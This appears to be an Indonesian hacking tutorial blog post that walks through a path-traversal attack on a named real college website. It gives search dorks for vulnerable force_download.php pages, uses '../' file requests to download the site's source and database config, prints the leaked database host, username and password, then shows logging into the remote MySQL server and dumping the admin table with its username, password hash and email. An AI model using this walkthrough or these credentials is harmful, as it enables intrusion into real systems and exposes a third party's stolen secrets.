& terima kasih juga dengan "DI GOOGLE BANYAK" ketika sering gw bertanya ama dia
yuk, sebelum mulai ada yang harus kita persiapkan, yaitu penerjemah dari php, bisa notepad / wordpad, tapi ga dinamis
kalo gw make PHPCODER, lebih enak dan dinamis sama di mengerti :D
KLIK DISINI untuk download phpcoder
yuk, first kita cari target
DORK :
inurl:force_download.php?file=Atau
inurl:forcedownload.php?file=
semua terserah imajinasi kalian bro !!
yuk target gw
http://www.lstmlondon.co.ukvuln disini, lalu download :
http://www.lstmlondon.co.uk/force_download.php?file=../index.php<?php
//ini_set('display_errors','On');
include("Connections/objConn.php");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>London School of Technology & Management</title>
<link rel="stylesheet" type="text/css" href="includes/css/lstn.css">
<script type="text/javascript" language="javascript" src="includes/js/dropdownmenu.js"></script>
<script type="text/javascript" language="javascript" src="includes/js/jqueryslidemenu.js"></script>
<script src="Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body class="indexbody">
<table cellpadding="0" cellspacing="0" width="962" align="center" border="0">
<tr>
<td valign="top" colspan="3"><?php include('includes/header.php') ?></td>
</tr>
<tr>
<td valign="top" height="5" colspan="3"></td>
</tr>
<tr>
<td width="650" valign="top"><script type="text/javascript">
AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','650','height','264','src','images/banner','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','wmode','transparent','movie','images/banner' ); //end AC code
</script>
<noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="650" height="264">
<param name="movie" value="images/banner.swf">
<param name="quality" value="high">
<param name="wmode" value="transparent">
<embed src="images/banner.swf" width="650" height="264" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" wmode="transparent"></embed>
</object>
</noscript> </td>
<td width="10"> </td>
<td width="301" valign="top"><img src="images/banner_index_right.jpg" alt="Apply Online" width="301" height="264" border="0" usemap="#Map"></td>
</tr>
<tr>
<td colspan="3" height="12"></td>
</tr>
<tr>
<td id="content_container"><p>London School of Technology and Management is situated in the heart of London at London Bridge with all its benefits and facilities for experience, life and study. With River Thames just a few steps away, the college takes pride for both its campus and facilities. Here students do discover the wealth of educational programmes and training opportunities to be rendered like a perennial fountain. </p>
<table cellpadding="0" cellspacing="0" width="100%" align="center" border="0">
<tr>
<td height="25"></td>
</tr>
<tr>
<td class="hotlinksbg"><div class="hot_link_titbg">Courses On Offer</div>
<div class="hotlink_pad"> The London School of Technology and Management offer comprehensive courses in the specialized sectors of Business and Human resources management.In near future we are planning to provide graduate and Masters Levels.
<a href="courses.php" class="seemore"><br>
See More</a></div></td>
<td class="hotlinksbg_mid"><div class="hot_link_titbg">affiliations</div>
<div class="hotlink_padmid"> <img src="images/26.JPG" border="0" width="70" height="65"> <img src="images/25.JPG" border="0">
<br><a href="affiliations.php" class="seemore">See More</a>
</div></td>
<td class="hotlinksbg"><div class="hot_link_titbg">From the desk</div>
<div class="hotlink_pad">
<div style="float:left; padding-right:6px;">
<img src="images/deskimg.jpg" width="92" height="93" alt="" border="0" class="blue_border_img">
</div><br>
<br>
<br>
<br>
<br>
<br>
<p>Choosing an educational institute for furthering your career can be difficult decision.</p>
<a href="fromdesk.php" class="seemore">See More</a>
</div>
</td>
</tr>
</table></td>
<td></td>
<td class="rightbg"><?php include('includes/right_panel.php') ?></td>
</tr>
</table>
<div class="footerbg"><?php include('includes/footer.php') ?></div>
<map name="Map"><area shape="rect" coords="31,177,260,252" href="apply_online.php">
</map></body>
</html>
lihat bagian :
lalu download :<?php
//ini_set('display_errors','On');
include("Connections/objConn.php");
?>
http://www.lstmlondon.co.uk/force_download.php?file=../Connections/objConn.phpww000tt !!
$hostname_objConn = "213.171.200.63";
$database_objConn = "lstmdata";
$username_objConn = "lstmuser321";
$password_objConn = "Auklstm_321"; server213-171-200-63.livedns.org.ukkalo gitu tinggal remoting aja kan? ahaha
langsung aja, kita remoting disini gw pake Appserv, kalo belom tau appserv KLIK DISINI untuk cari tau !!
kalo udah install langsung aja, default nya kan di C:
yuk, run => cmd => ketik C: =>cd appserv => cd mysql => cd bin
nah, langsung aja kasih racikan
yuk, racikanya gini:
mysql -h namahost/server -u usernamedb -ppassword namadatabaseudah masuk, gw ketik "show databases;"
keluar :
information_schemalstmdata langsung aja gw hajar yang lstmdata :
use lstmdata;w00t !!
[database changed] lalu ketik
show tables;
asik, ada table admin tuhlstm_admin
lstm_aff_dept
lstm_affiliation
lstm_courses
lstm_department
lstm_download
lstm_download_cat
lstm_marketting
lstm_newtask
lstm_student_form
langsung aja ketik :
select * from lstm_admin;w0000000ttt !!!
Yang Keluar Beginian
wkakwa, tapi password nya belom berhasil ane decrypt, tapi ya sudahlah segini ane udah cukup,username : lstm_admin
password : 7f58c64c6b48ec087a416d48173fb39c
admin mailid : admin@lstm.com
